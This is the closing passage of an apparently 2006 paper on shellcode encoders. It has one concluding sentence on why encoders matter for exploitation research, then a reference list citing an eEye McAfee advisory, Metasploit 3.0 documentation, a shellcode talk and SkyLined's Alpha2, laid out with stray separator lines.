many readers may never find it necessary to implement an encoder, it's
|
|
nevertheless a necessary topic to understand for those who are interested in
|
|
exploitation research.
|
|
|
|
|
|
A. References
|
|
|
|
eEye. McAfee Subscription Manager Stack Buffer Overflow.
|
|
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
|
|
accessed Aug 26, 2006.
|
|
|
|
|
|
Metasploit Staff. Metasploit 3.0 Developer's Guide.
|
|
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
|
|
accessed Aug 26, 2006.
|
|
|
|
|
|
Spoonm. Recent Shellcode Developments.
|
|
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
|
|
accessed Aug 26, 2006.
|
|
|
|
|
|
SkyLined. Alpha 2.
|
|
http://www.edup.tudelft.nl/ bjwever/documentation_alpha2.html.php;
|
|
accessed Aug 26, 2006.
|
|
|
|
|
|
|
|
|